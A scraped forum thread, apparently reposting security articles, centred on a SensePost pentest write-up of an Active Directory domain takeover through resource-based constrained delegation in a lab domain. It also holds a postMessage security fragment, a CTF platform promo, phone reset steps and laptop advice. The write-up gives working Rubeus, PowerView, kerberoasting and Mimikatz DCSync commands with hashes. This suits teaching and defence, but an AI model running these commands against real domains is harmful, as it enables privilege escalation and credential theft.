    • Refer to the OWASP HTML 5 Security Cheat Sheet.
    • When sending a message explicitly state the targetOrigin (do not use the wildcard *)
    • When receiving a message carefully validate the origin of any message to ensure it is from an expected source.
    • When receiving a message carefully validate the data to ensure it is in the expected format and safe to use in the context it is in (e.g. HTML markup within the data may not be safe to embed directly into the page as this would introduce DOM Based Cross Site Scripting).

    Web Storage

     

    Sursa: https://grimhacker.com/2020/04/02/exploiting-xdlocalstorage-localstorage-and-postmessage/

  17. Chaining multiple techniques and tools for domain takeover using RBCD

    Reading time ~26 min
    Posted by Sergio Lazaro on 09 March 2020

    Intro

    In this blog post I want to show a simulation of a real-world Resource Based Constrained Delegation attack scenario that could be used to escalate privileges on an Active Directory domain.

    I recently faced a network that had had several assessments done before. Luckily for me, before this engagement I had used some of my research time to understand more advanced Active Directory attack concepts. This blog post isn’t new and I used lots of existing tools to perform the attack. Worse, there are easier ways to do it as well. But, this assessment required different approaches and I wanted to show defenders and attackers that if you understand the concepts you can take more than one path.

    The core of the attack is about abusing resource-based constrained delegation (RBCD) in Active Directory (AD). Last year, Elad Shamir wrote a great blog post explaining how the attack works and how it can result in a Discretionary Access Control List (DACL)-based computer object takeover primitive. In line with this research, Andrew Robbins and Will Schroeder presented DACL-based attacks at Black Hat back in 2017 that you can read here.

    To test the attacks I created a typical client network using an AWS Domain Controller (DC) with some supporting infrastructure. This also served as a nice addition to our Infrastructure Training at SensePost by expanding the modern AD attack section and practicals. We’ll be giving this at BlackHat USA. The attack is demonstrated against my practise environment.

    Starting Point

    After some time on the network, I was able to collect local and domain credentials that I used in further lateral movement. However, I wasn’t lucky enough to compromise credentials for users that were part of the Domain Admins group. Using BloodHound, I realised that I had compromised two privileged groups with the credentials I gathered: RMTAdmins and MGMTAdmins.

    The users from those groups that will be used throughout the blogpost are:

    1. RONALD.MGMT (cleartext credentials) (Member of MGMTAdmins)
    2. SVCRDM (NTLM hash) (Member of RMTADMINS)

    One – The user RONALD.MGMT was configured with interesting write privileges on a user object. If the user was compromised, the privileges obtained would create the opportunity to start a chain of attacks due to DACL misconfigurations on multiple users. To show you a visualisation, BloodHound looked as follows:

    attack-path-1024x572.png Figure 1 – DACL attack path from RONALD.MGMT to SVCSYNC user.

    According to Figure 1, the SVCSYNC user was marked as a high value target. This is important since this user was able to perform a DCSync (due to the GetChanges & GetChangesAll privileges) on the main domain object:

    dcsync-1-1024x453.png Figure 2 – SVCSYNC had sufficient privileges on the domain object to perform a DCSync.

    Two – The second user, SVCRDM, was part of a privileged group able to change the owner of a DC computer due to the WriteOwner privilege. The privileges the group had were applied to all the members, effectively granting SVCRDM the WriteOwner privilege. BloodHound showed this relationship as follows:

    writeowner-2-1024x196.png Figure 3 – SVCRDM user, member of RMTADMINS, had WriteOwner privileges over the main DC.

    With these two graphs BloodHound presented, there were two different approaches to compromise the domain:

    1. Perform a chain of targeted kerberoasting attacks to compromise the SVCSYNC user to perform a DCSync.
    2. Abuse the RBCD attack primitive to compromise the DC computer object.

    Targeted Kerberoasting

    There are two ways to compromise a user object when we have write privileges (GenericWrite/GenericAll/WriteDacl/WriteOwner) on the object: we can force a password reset or we can rely on the targeted kerberoasting technique. For obvious reasons, forcing a password reset on these users wasn’t an option. The only option to compromise the users was a chain of targeted kerberoasting attacks to finally reach the high value target SVCSYNC.

    Harmj0y described the targeted kerberoasting technique in a blog post he wrote while developing BloodHound with _wald0 and @cptjesus. Basically, when we have write privileges on a user object, we can add the Service Principal Name (SPN) attribute and set it to whatever we want. Then kerberoast the ticket and crack it using John/Hashcat. Later, we can remove the attribute to clean up the changes we made.

    There are a lot of ways to perform this attack. Probably the easiest way is using PowerView. However, I chose to use Powershell’s ActiveDirectory module and impacket.

    According to Figure 2, my first target was SUSANK on the road to SVCSYNC. Since I had the credentials of RONALD.MGMT I could use Runas on my VM to spawn a PowerShell command line using RONALD.MGMT’s credentials:

    runas /netonly /user:ronald.mgmt@maemo.local powershell

    Runas is really useful as it spawns a CMD using the credentials of a domain user from a machine which isn’t part of the domain. The only requirement is that DNS resolves correctly. The /netonly flag is important because the provided credentials will only be used when network resources are accessed.

    runas-1024x459.png Figure 4 – Spawning Powershell using Runas with RONALD.MGMT credentials.

    In the new PowerShell terminal, I loaded the ActiveDirectory PowerShell module to perform the targeted kerberoast on the user I was interested in (SUSANK in this case). Below are the commands used to add a new SPN to the account:

    Import-Module ActiveDirectory
    Get-ADUser susank -Server MAEMODC01.maemo.local
    Set-ADUser susank -ServicePrincipalNames @{Add="sensepost/targetedkerberoast"} -Server MAEMODC01.maemo.local
    targeted-kerberoast-1024x437.png Figure 5 – Targeted Kerberoast using ActiveDirectory Powershell module.

    After a new SPN is added, we can use impacket’s GetUserSPNs to retrieve Ticket Granting Service Tickets (TGS) as usual:

    GetUserSPNs-1024x429.png Figure 6 – Impacket’s GetUserSPNs was used to request the Ticket-Granting-Service (TGS) of every SPN.

    In the lab there weren’t any other SPN’s configured although in the real world there’s likely to be more. TGS tickets can be cracked as portions of the ticket are encrypted using the target users’s Kerberos 5 TGS-REP etype 23 hash as the private key, making it possible to obtain the cleartext password of the target account in an offline brute force attack. In this case, I used Hashcat:

    CrackedPassword-1024x259.png Figure 7 – The TGS obtained before was successfuly cracked using Hashcat.

    Once the user SUSANK was compromised, I repeated the same process with the other users in order to reach the high value target SVCSYNC. However, I had no luck when I did the targeted kerberoasting attack and tried to crack the tickets of PIERREQA and JUSTINC users, both necessary steps in the path. Thus, I had to stop following this attack path.

    However, having the ability to add the serviceprincipalname attribute to a user was really important in order to compromise the DC later by abusing the RBCD computer object primitive. Keep this in mind as we’ll come back later to SUSANK.

    Resource-based Constrained Delegation (RBCD)

    I’m not going to dig into all of the details on how a RBCD attack works. Elad wrote a really good blog post called “Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory” that explains all the concepts I’m going to use. If you haven’t read it, I suggest you stop here and spend some time trying to understand all the requirements and concepts he explained. It’s a long blog post, so grab some coffee ;)

    As a TL;DR, I’ll list the main concepts you’ll need to know to spot and abuse Elad’s attack:

    1. Owning an SPN is required. This can be obtained by setting the serviceprincipalname attribute on a user object when we have write privileges. Another approach relies on abusing a directories MachineAccountQuota to create a computer account which by default, comes with the serviceprincipalattribute set.
    2. Write privileges on the targeted computer object are required. These privileges will be used to configure the RBCD on the computer object and the user with the serviceprincipalname attribute set.
    3. The RBCD attack involves three steps: request a TGT, S4U2Self and S4U2Proxy.
    4. S4U2Self works on any account that has the serviceprincipalname attribute set.
    5. S4U2Self allows us to obtain a valid TGS for arbitrary users (including sensitive users such as Domain Admins group members).
    6. S4U2Proxy always produces a forwardable TGS, even if the TGS used isn’t forwardable.
    7. We can use Rubeus to perform the RBCD attack with a single command.

    One of the requirements, owning a SPN, was already satisfied due to the targeted kerberoasting attack performed to obtain SUSANK’s credentials. I still needed write privileges on the targeted computer which in this case was the DC. Although I didn’t have write privileges directly, I had WriteOwner privileges with the second user mentioned in the introduction, SVCRDM.

    writeowner-1-1024x196.png Figure 8 – SVCRDM could have GenericAll privileges if the ownership of MAEMODC01 was acquired.

    An implicit GenericAll ACE is applied to the owner of an object, which provided an opportunity to obtain the required write privileges. In the next section I explain how I changed the owner of the targeted computer using Active Directory Users & Computers (ADUC) in combination with Rubeus. Later on, a simulated attack scenario showing how to escalate privileges within AD in a real environment by abusing the RBCD computer takeover primitive is shown.

    Ticket Management with Rubeus

    Since the SVCRDM user was part of the RMTADMINS group, which could modify the owner of the DC, it was possible to make SVCRDM, or any other user I owned, the owner of the DC. Being the owner of an object would grant GenericAll privileges. However, I only had the NTLM hash for the SVCRDM user, so I chose to authenticate with Kerberos. In order to do that, I used Rubeus (thank you to Harmj0y and all the people that contributed to this project).

    To change the owner of the DC I had to use the SVCRDM account. An easy way to change the owner of an AD object is by using PowerView. Another way to apply the same change would be by using ADUC remotely. ADUC allows us to manage AD objects such as users, groups, Organization Units (OU), as well as their attributes. That means that we can use it to update the owner of an object given the required privileges. Since I couldn’t crack the hash of SVCRDM’s password, I wasn’t able to authenticate using SVCRDM’s credentials but it was possible to request a Kerberos tickets for this account using Rubeus and the hash. Later, I started ADUC remotely from my VM to change the owner of the targeted DC.

    It’s out of the scope of this blog to explain how Kerberos works, please refer to the Microsoft Kerberos docs for further details.

    On a VM (not domain-joined), I spawned cmd.exe as local admin using runas with the user SVCRDM. This prompt allowed me to request and import Kerberos tickets to authenticate to domain services. I ran runas with the /netonly flag to ensure the authentication is only performed when remote services are accessed. As I had used the /netonly flag and had I chosen to authenticate using Kerberos tickets, the password I gave runas wasn’t the correct one.

    runas /netonly /user:svcrdm@maemo.local cmd
    runas-1.png Figure 9 – Starting Runas with the SVCRDM domain user and a wrong password.

    In the terminal running as the SVCRDM user, I used Rubeus to request a Ticket-Granting-Ticket (TGT) for this user. The /ptt (pass-the-ticket) parameter is important to automatically add the requested ticket into the current session.

    Rubeus.exe asktgt /user:SVCRDM /rc4:a568802050cd83b8898e5fb01ddd82a6 /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local
    request-tgt-1-1024x545.png Figure 10 – Requesting a TGT for the SVCRDM user with Rubeus.

    In order to access a certain service using Kerberos, a Ticket-Granting-Service (TGS) ticket mis required. By presenting the TGT, I was authorised to request a TGS to access the services I was interested on. These services were the LDAP and CIFS services on the DC. We can use Rubeus to request these two TGS’. First, I requested the TGS for the LDAP service:

    Rubeus.exe asktgs /ticket:[TGT_Base64] /service:ldap/MAEMODC01.maemo.local /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local
    ldap-tgs-1-1024x560.png Figure 11 – Using the previous TGT to obtain a TGS for the LDAP service on MAEMODC01.

    In the same way, I requested a TGS for the CIFS service of the targeted DC:

    Rubeus.exe asktgs /ticket:[TGT_Base64] /service:cifs/MAEMODC01.maemo.local /ptt /domain:maemo.local /dc:MAEMODC01.maemo.local
    cifs-tgs-1-1024x607.png Figure 12 – Using the previous TGT to obtain a TGS for the CIFS service on MAEMODC01.

    The tickets were imported successfully and can be listed in the output of the klist command:

    klist-1-1024x859.png Figure 13 – The requested Kerberos tickets were imported successfully in the session.

    Literally Owning the DC

    With the Kerberos tickets imported, we can start ADUC and use it to modify the targeted Active Directory environment. As with every other program, we can start ADUC from the terminal. In order to do it, I used mmc, which requires admin privileges. This is why the prompt I used to start runas and request the Kerberos tickets required elevated privileges. Because of the SVCRDM Kerberos ticket imported in the session, we’ll be able to connect to the DC without credentials being provided. To start ADUC I typed the following command:

    mmc %SystemRoot%\system32\dsa.msc

    After running this command, ADUC gave an error saying that the machine wasn’t domain joined and the main frame was empty. No problem, just right-click the “Active Directory Users and Computers” on the left menu to choose the option “Change Domain Controller…”. There, the following window appeared:

    aduc-dc-connection-1024x553.png Figure 14 – Selecting the Directory Server on ADUC.

    After adding the targeted DC, Figure 14 shows the status as “Online” so I clicked “OK” and I was able to see all the AD objects:

    aduc-remote-1024x393.png Figure 15 – AD objects of the MAEMO domain were accessible remotely using ADUC.

    Every AD object has a tab called “Security” which includes all the ACEs that are applied to it. This tab isn’t enabled by default and it must be activated by clicking on View > Advanced Features. At this point, I was ready to take ownership of the DC. Accessing the MAEMODC01 computer properties within the Domain Controllers OU and checking the advanced button on the “Security” tab, I was able to see that the owners were the Domain Admins:

    previous-owner-1024x646.png Figure 16 – MAEMODC01 owned by the Domain Admins group.

    The user SVCRDM had the privilege to change the owner so I clicked on “Change” and selected the SVCRDM user:

    owner-changed-1024x648.png Figure 17 – MAEMODC01 owner changed to the user SVCRDM.

    If you have a close look to Figure 17, most of the buttons are disabled because of the limited permissions granted to SVCRDM. Changing the owner is the only option available.

    As I said before, ownership of an object implies GenericAll privileges. After all these actions, I wanted to make everything a bit more comfortable for me, so I added the user RONALD.MGMT with GenericAll privileges on the MAEMODC01 object for use later. The final status of the DACL for the MAEMODC01 object looked as follows:

    genericall-ronald-1024x493.png Figure 18 – User RONALD.MGMT with Full Control (GenericAll) on the MAEMODC01.

    Computer Object Takeover

    According to Elad Shamir’s blog post (that I still highly encourage you to read), one of the requirements to weaponise the S4U2Self and S4U2Proxy process with the RBCD is to have control over an SPN. I ran a targeted Kerberoast attack to take control of SUSANK so that requirement was satisfied as this user had the serviceprincipalname attribute set.

    If it isn’t possible to get control of an SPN, we can use Powermad by Kevin Robertson to abuse the default machine quota and create a new computer account which will have the serviceprincipalname attribute set by default. In the Github repository, Kevin mentioned the following:

    The default Active Directory ms-DS-MachineAccountQuota attribute setting allows all domain users to add up to 10 machine accounts to a domain. Powermad includes a set of functions for exploiting ms-DS-MachineAccountQuota without attaching an actual system to AD.

    Before abusing the computer object takeover primitive, some more requirements needed to be met. The GenericAll privileges I set up for RONALD.MGMT previously would allow me to write the necessary attributes of the targeted DC. This is important because I needed to add an entry for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the targeted computer (the DC) that pointed back to the SPN I controlled (SUSANK). This configuration will be abused to impersonate any user in the domain, including high privileged accounts such as the Domain Admins group members:

    domain-admins-1-1024x618.png Figure 19 – Domain Admins group members.

    The following details are important in order to abuse the DACL computer takeover:

    • The required SPN is SUSANK.
    • The targeted computer is MAEMODC01, the DC of the maemo.local domain.
    • The user RONALD.MGMT has GenericAll privileges on MAEMODC01.
    • The required tools are PowerView and Rubeus.

    I had access to a lot of systems due to the compromise of both groups RMTAdmins and MGMTAdmins. I used the privileges I had to access a domain joined Windows box. There, I loaded PowerView in memory since, in this case, an in-memory PowerShell script execution wasn’t detected.

    Harmj0y detailed how to take advantage of the previous requirements in this blog post. During the assessment, I followed his approach but did not need to create a computer account as I already owned an SPN. Harmj0y also provided a gist containing all the commands needed.

    Running PowerShell with RONALD.MGMT user, the first thing we need are the SIDs of the main domain objects involved: RONALD.MGMT and MAEMODC01.maemo.local. Although it wasn’t necessary, I validated the privileges the user RONALD.MGMT had on the targeted computer to double-check the GenericAll privileges I granted it with. I used Get-DomainUser and Get-DomainObjectAcl.

    #First, we get ronald.mgmt (attacker) SID
    $TargetComputer = "MAEMODC01.maemo.local"
    $AttackerSID = Get-DomainUser ronald.mgmt -Properties objectsid | Select -Expand objectsid
    $AttackerSID
    
    #Second, we check the privileges of ronald.mgmt on MAEMODC01
    $ACE = Get-DomainObjectAcl $TargetComputer | ?{$_.SecurityIdentifier -match $AttackerSID}
    $ACE
    
    #We can validate the ACE applies to ronald.mgmt
    ConvertFrom-SID $ACE.SecurityIdentifier
    1.GetSID-ACE-1024x507.png Figure 20 – Obtaining the attacker SID and validating its permissions on the targeted computer.

    The next step was to configure the msDS-AllowedToActOnBehalfOfOtherIdentity attribute for the owned SPN on the targeted computer. Using Harmj0y’s template I only needed the service account SID to prepare the array of bytes for the security descriptor that represents this attribute.

    #Now, we get the SID for our SPN user (susank)
    $ServiceAccountSID = Get-DomainUser susank -Properties objectsid | Select -Expand objectsid
    $ServiceAccountSID
    
    #Later, we prepare the raw security descriptor
    $SD = New-Object Security.AccessControl.RawSecurityDescriptor -Argument "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ServiceAccountSID))"
    $SDBytes = New-Object byte[] ($SD.BinaryLength)
    $SD.GetBinaryForm($SDBytes, 0)
    2.RawSecurityDescriptor-1024x156.png Figure 21 – Creating the raw security descriptor including the SPN SID for the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

    Then, I added the raw security descriptor forged earlier, to the DC, which was possible due to the GenericAll rights earned after taking ownership of the DC.

    # Set the raw security descriptor created before ($SDBytes)
    Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
    
    # Verify the security descriptor was added correctly
    $RawBytes = Get-DomainComputer $TargetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity' | Select -Expand msds-allowedtoactonbehalfofotheridentity
    $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
    $Descriptor.DiscretionaryAcl
    3.Add-RawSecurityDescriptor-1-1024x222.p Figure 22 – The raw security descriptor forged before was added to the targeted computer.

    With all the requirements fulfilled, I went back to my Windows VM. There, I spawned cmd.exe via runas /netonly using SUSANK’s compromised credentials:

    1.Runas-Susank.png Figure 23 – New CMD prompt spawned using Runas and SUSANK credentials.

    Since I didn’t have SUSANK’s hash, I used Rubeus to obtain it from the cleartext password:

    2.Password-to-hash-1024x485.png Figure 24 – Obtaining the password hashes with Rubeus.

    Elad included the S4U abuse technique in Rubeus and we can perform this attack by running a single command in order to impersonate a Domain Admin (Figure 19), in this case, RYAN.DA:

    Rubeus.exe s4u /user:susank /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:ryan.da /msdsspn:cifs/MAEMODC01.maemo.local /dc:MAEMODC01.maemo.local /domain:maemo.local /ptt
    3.S4U-TGT-1024x607.png Figure 25 – S4U abuse with Rubeus. TGT request for SUSANK. 4.S4U-S4U2Self-1024x584.png Figure 26 – S4U abuse with Rubeus. S4U2self to get a TGS for RYAN.DA. 5.S4U-S4U2Proxy-1024x510.png Figure 27 – S4U abuse with Rubeus. S4U2Proxy to impersonate RYAN.DA and access the CIFS service on the targeted computer.

    The previous S4U abuse imported a TGS for the CIFS service due to the /ptt option in the session. A CIFS TGS can be used to remotely access the file system of the targeted system. However, in order to perform further lateral movements I chose to obtain a TGS for the LDAP service and, since the impersonated user is part of the Domain Admins group, I could use Mimikatz to run a DCSync. Replacing the previous Rubeus command to target the LDAP service can be done as follows:

    Rubeus.exe s4u /user:susank /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /impersonateuser:ryan.da /msdsspn:ldap/MAEMODC01.maemo.local /dc:MAEMODC01.maemo.local /domain:maemo.local /ptt

    Listing the tickets should show the two TGS obtained after running the S4U abuse:

    6.klist_-1024x621.png Figure 28 – CIFS and LDAP TGS for the user RYAN.DA.

    With these TGS (DA account) I was able to run Mimikatz to perform a DCSync and extract the hashes of sensitive domain users such as RYAN.DA and KRBTGT:

    1.dcsync-ryan-da-1024x643.png Figure 29 – DCSync with Mimikatz to obtain RYAN.DA hashes. 2.dcsync-krbtgt-1024x610.png Figure 30 – DCSync with Mimikatz to obtain KRBTGT hashes.

    Since getting DA is just the beginning, the obtained hashes can be used to move lateraly within the domain to find sensitive information to show the real impact of the assessment.

    Clean Up Operations

    Once the attack has been completed successfully, it doesn’t make sense to leave domain objects with configurations that aren’t needed. Actually, these changes could be a problem in the future. For this reason, I considered it was important to include a cleanup section.

    • Remove the security descriptor msDS-AllowedToActOnBehalfOfOtherIdentity configured in the targeted computer.

    The security descriptor can be removed by using PowerView:

    Get-DomainComputer $TargetComputer | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'
    • Clean-up the GenericAll ACE included in the targeted computer for the RONALD.MGMT user.

    Due to this ACE being added when using ADUC, I used SVCRDM to remove it. Just select the RONALD.MGMT Full Control row and delete it.

    • Replace the targeted computer owner with the Domain Admins group.

    One more time, using ADUC with the SVCRDM user, I selected the Change section to modify the owner back to the Domain Admins group.

    • Remove the serviceprincipalname attribute on SUSANK.

    Using the ActiveDirectory Powershell module, I ran the following command to remove the SPN attribute configured on SUSANK:

    Set-ADUser susank -ServicePrincipalName @{Remove="sensepost/targetedkerberoast"} -Server MAEMODC01.maemo.local

    Conclusions

    In this blog post I wanted to show a simulation of a real attack scenario used to escalate privileges on an Active Directory domain. As I said in the beginning, none of this is new and the original authors did a great job with their research and the tools they released.

    Some changes could be applied using different tools to obtain the exact same results. However, the main goal of this blog post was to show different ways to reach the same result. Some of the actions performed in this blog post could be done in a much easier way by just using a single tool such as PowerView. A good example is the way I chose to modify the owner of the DC. The point here was to show that by mixing concepts such as Kerberos tickets and some command line tricks, we can use ADUC remotely without a cleartext password. Although it required more steps, using all this stuff during the assessment was worth it!

    BloodHound is a useful tool for Active Directory assessments, especially in combination with other tools such as Rubeus and PowerView. AD DACL object takeovers are easier to spot and fix or abuse, bringing new ways to elevate privileges in a domain.

    Elad’s blog post is a really useful resource full of important information on how delegation can be used and abused. With this blog post I wanted to show you that, although it’s possible that we don’t have all the requirements to perform an attack, with a certain level of privileges we can configure everything we need. As with any other technique while doing pentests, we can chain different misconfigurations to reach a goals such as the Domain Admin. Although getting a DA account isn’t the goal of every pentest, it’s a good starting point to find sensitive information in the internal network of a company.

    References

    Links:

    If you find any glaring mistakes or have any further questions do not hesitate on sending an email to sergio [at] the domain of this blog.

     

    Sursa: https://sensepost.com/blog/2020/chaining-multiple-techniques-and-tools-for-domain-takeover-using-rbcd/

  18. About CyberEDU Platform & Exercises

    We took over the mission to educate and teach the next generation of infosec specialists with real life hacking scenarios having different levels of difficulty depending on your knowledge set. It's a dedicated environment for practicing their offensive and defensive skills.

     

    100 exercises used in international competitions ready to be discovered

    Our experts created a large variety of challenges covering different aspects of the infosec field. All challenges are based on real life scenarios which are meant to teach students how to spot vulnerabilities and how to react in different situations.

     

    Link: https://cyberedu.ro/

    • Like 1
    • Thanks 1
    • Upvote 3
  19. E posibil sa nu mearga, dar vezi al 10-lea post de aici: http://forum.gsmhosting.com/vbb/f453/sm-g928t-how-disable-retail-mode-2074034/

     

    Okay this is how you do it, super easy

    Download: https://apkpure.com/free-simple-fact....android?hl=en

    1. Connect phone to PC
    2. Place Simple Factory Reset.apk in the phone's storage
    3. Install Simple Factory Reset.apk
    4. Open Simple Factory Reset
    5. Click reset
    5. Wait untill you see a message that says something like "not allowed to shut down"
    6. Once you see that restart the phone (hold: volume down, volume up, power and home button)
    7. As soon as phone goes black, boot into recovery (hold power, volume up, and home button)
    8. Let phone reset

    Done, phone will restart and retail mode is no more.
    This works on all samsung, ive tested it myself on s4, s5, s6, and s7 as well

    I had several of these and was looking all over to figure out how to do it. The S4 and S5 were easy cuz all you needed was a custom recovery. Took me a while to find a way for the s6 and s7. Turns out its easier with the s6/s7 way. No need to flash any custom firmware

    • Thanks 1
  20. Cautare rapida, 3 posibilitati:

    - https://www.emag.ro/laptop-lenovo-ideapad-s145-15iil-cu-procesor-intelr-coretm-i5-1035g4-pana-la-3-70-ghz-ice-lake-15-6-full-hd-12gb-512gb-ssd-intelr-irisr-plus-graphics-free-dos-platinum-grey-81w8003jrm/pd/DB91WGBBM/

    - https://www.emag.ro/laptop-asus-x509fa-with-processor-intelr-coretm-i7-8565u-pana-la-4-60-ghz-whiskey-lake-15-6-full-hd-8gb-512gb-ssd-intel-uhd-graphics-620-free-dos-slate-gray-x509fa-ej081/pd/DNRSNWBBM/

    - https://www.emag.ro/laptop-acer-aspire-5-a515-54g-cu-procesor-intelr-corer-i7-10510u-pana-la-4-90-ghz-comet-lake-15-6-full-hd-ips-8gb-512gb-ssd-nvidiar-geforcer-mx250-2gb-endless-black-nx-hmzex-004/pd/D075ZWBBM/

     

    Toate au 512 SSD, eu zic ca e necesar. Unul are 12 GB RAM, dar i5 in loc de i7.

    Nu stiu, depinde de ce alte lucruri iei in considerare. Ca brand eu am sau am avut ASUS, Lenovo, HP, MacBook Pro (ca idee) si nu am avut niciodata probleme cu vreunul dintre ele. Ideea pe care vreau sa o subliniez e sa nu tii cont prea mult de brand daca nu ai motive evidente.

    Poti sa alegi ceva cu placa video dedicata, desi nu te joci. De exemplu.

    • Upvote 2
×
×
  • Create New...